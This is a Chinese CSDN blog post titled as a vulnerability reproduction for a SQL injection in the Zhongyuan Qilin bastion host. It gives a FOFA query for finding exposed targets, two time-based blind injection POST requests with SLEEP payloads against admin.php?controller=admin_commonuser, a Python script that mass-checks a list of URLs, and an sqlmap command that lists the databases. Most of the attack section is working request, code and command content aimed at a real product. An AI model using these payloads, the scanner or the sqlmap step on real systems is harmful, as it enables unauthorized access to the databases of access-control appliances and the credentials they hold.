中远麒麟堡垒机SQL注入漏洞

最新推荐文章于 2024-06-13 14:29:56 发布
最新推荐文章于 2024-06-13 14:29:56 发布
阅读量212 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: sql 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/135822881
版权

影响版本

中远麒麟堡垒机
image.png
image.png

复现

fofa:body="url=“admin.php?controller=admin_index&action=get_user_login_fristauth&username=”
向目标发送如下请求数据包,使响应延迟5秒

POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=admin' AND (SELECT 12 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm

image.png
向目标发送如下请求数据包,使响应延迟15秒

POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 79
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=admin' AND (SELECT 12 FROM (SELECT(SLEEP(15)))ptGN) AND 'AAdm'='AAdm

image.png
正常系统是在毫秒级响应,加上SLEEP(5)和SLEEP(15)之后响应时间分别为5.064秒和15.134秒证明存在sql注入漏洞

批量检测

该python脚本可以批量检测漏洞,C:\Users\DELL\Desktop\1.txt为输入目标文件,每行是一个url

import argparse
import time
import requests

def get_url(file):
    with open('{}'.format(file),'r',encoding='utf-8') as f:
        for i in f:
            i = i.replace('\n', '')
            send_req(i)

def write_result(content):
    f = open("result.txt", "a", encoding="UTF-8")
    f.write('{}\n'.format(content))
    f.close()

def send_req(url_check):
    print('{} runing Check'.format(url_check))
    url = url_check + '/admin.php?controller=admin_commonuser'
    header = {
        'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'
    }
    
    try:
        requests.packages.urllib3.disable_warnings()
        response = requests.get(url=url,headers=header,verify=False,timeout=3)
        
        if response.status_code == 200 and "result" in response.text and "username and password does not match!" in response.text:
            result = '{} 存在中远麒麟堡垒机SQL注入漏洞!\n'.format(url_check)
            print(result)
            write_result(result)
        time.sleep(1)
    except Exception as e:
        pass

if __name__ == '__main__':
    file = r"C:\Users\DELL\Desktop\1.txt"
    get_url(file)

漏洞利用

使用Sqlmap获取数据库名称,中间提示一路输入Y并回车即可

sqlmap -u "https://ip:port/admin.php?controller=admin_commonuser" --data "username=admin" --level=3 --dbs
qq_36334672
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
中远麒麟堡垒机 SQL注入漏洞复现
0xSec
08-16 2259
中远麒麟堡垒机/baoleiji/api/tokens接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
中远麒麟堡垒机SQL注入漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-07 400
中远麒麟堡垒机用于运维管理的认证、授权、审计等监控管理,在该产品admin.php处存在SQL 注入漏洞。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
漏洞复现--中远麒麟堡垒机SQL注入
qq_53003652的博客
10-06 356
麒麟堡垒机用于运维管理的认证、授权、审计等监控管理,在该产品admin.php处存在SQL 注入漏洞。自行寻找厂家发布的安全补丁,若暂无补丁,尽快将系统放入内网。漏洞存在,sqlmap直接利用。需要下载的可后台私我我发你。
中远麒麟堡垒机2处SQL注入漏洞
qq_39894062的博客
04-01 873
中远麒麟堡垒机2处SQL注入漏洞
北京中远麒麟堡垒机某接口存在SQL 注入漏洞-1day未公开漏洞
weixin_43167326的博客
02-26 576
中远麒麟堡垒机是一款集堡垒机、运维审计、权限管控、风险分析、日志分析等功能于一体的安全运维审计系统。SQL注入是一种常见的网络攻击手段,攻击者可以通过在输入字段中插入恶意的SQL代码,从而绕过应用程序的安全机制,对数据库进行非法操作,如读取、修改、删除数据等。
中远麒麟堡垒机admin_commonuserSQL注入漏洞
xiaokp7的博客
09-13 413
中远麒麟依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控,消除了传统运维过程中的盲区,实现了运维简单化、操作可控化、过程可视化,是企业 IT 内控最有效的管理平台。中远麒麟堡垒机admin.php接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
堡垒机SQL注入漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-06 691
中远麒麟堡垒机能够提供细粒度的访问控制,最大限度保护用户资源的安全麒麟堡垒机存在SQL注入漏洞漏洞漏洞等级高危漏洞影响中远麒麟堡垒机FOFA。
北京中远麒麟科技有限公司麒麟堡垒机controller新接口存在SQL注入漏洞
weixin_43167326的博客
03-20 826
某远麒麟堡垒机是一款专业的网络安全设备,能够为企业提供强大的网络安全防护服务。它采用先进的智能算法和技术,能够在企业内部构建一道坚固的安全防线,有效地保护企业的网络不受来自外部和内部的攻击和威胁。该设备具有高可靠性、高扩展性和灵活性等优点,能够满足不同规模企业的安全需求。同时,该设备也支持多种安全防护功能,如流量管理、入侵检测、反病毒、VPN、WEB过滤等,确保企业的网络安全稳定可靠。此系统某接口存在SQL注入漏洞,攻击者可以攻击数据库,造成重要信息泄露。
中远麒麟堡垒机tokensSQL注入漏洞
xiaokp7的博客
09-13 278
中远麒麟依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控,消除了传统运维过程中的盲区,实现了运维简单化、操作可控化、过程可视化,是企业 IT 内控最有效的管理平台。中远麒麟堡垒机admin.php接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
中远麒麟堡垒机手册V1.6.docx
07-16
1.1 安装包安装  系统需求:内存>=2G、CPU>=1核、硬盘>=10... PC需要可以访问到堡垒机的TCP 22、443、3389、3390、18080端口  堡垒机需要能连接到被管理服务器的ssh、rdp等端口  PC不需要能访问到被管理的服务器
中远麒麟堡垒机管理员手册1
08-03
5.2.1 添加用户 15 5.2.2 批量添加用户 17 5.2.3 批量编辑用户 18 5.10 5.11 5.12 5.12.1 应用发布服务器 29 5
中远变频器在风机节能应用的解析
10-22
目前在我国各行各业的各类机械与电气设备中与风机水泵配套的电机约占全国电机装机量的65%,耗用电能约占全国发电总量的五分之二。并且大多数风机、水泵在使用过程中都存在大马拉小车的现象。因生产、工艺及气温等方面...
210610中远.zip
06-10
210610中远最新项目
6.24中远src.zip
06-24
6.24中远src,6.24中远src,
Flink Sql-用户自定义 Sources & Sinks
bigdatakenan的博客
06-13 694
在许多情况下,开发人员不需要从头开始创建新的连接器,而是希望稍微修改现有的连接器或 hook 到现有的 stack。在其他情况下,开发人员希望创建专门的连接器。本节对这两种用例都有帮助。它解释了表连接器的一般体系结构,从 API 中的纯粹声明到在集群上执行的运行时代码实心箭头展示了在转换过程中对象如何从一个阶段到下一个阶段转换为其他对象。
【大数据】Spark使用大全:下载安装、RDD操作、JAVA编程、SQL
最新发布
Joker_ZJN的博客
06-13 563
一文详解Spark的使用
jmeter性能优化之mysql监控sql慢查询语句分析
回家吃月饼的学习交流地
06-09 843
jmeter性能之sql慢查询语句分析
Sqlite3入门和c/c++下使用
fg247778718的博客
06-13 373
1. 创建数据表格create table 表名(字段名 数据类型, 字段名 数据类型);2. 插入数据insert into 表名 values('字段数据','字段数据','字段数据','字段数据' );insert into student values('20200101', '张三', '广州','25648');insert into student values('20200102', '李四', '广州','25645');3. 查询数据(1) 查询。
中远海运webpack
08-11
中远海运使用webpack是为了实现前端项目的模块化打包和构建工作。webpack是一个现代化的前端构建工具,它可以将各种前端资源(如JavaScript、CSS、图片等)进行打包,并且支持代码的分割、懒加载、压缩等功能,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值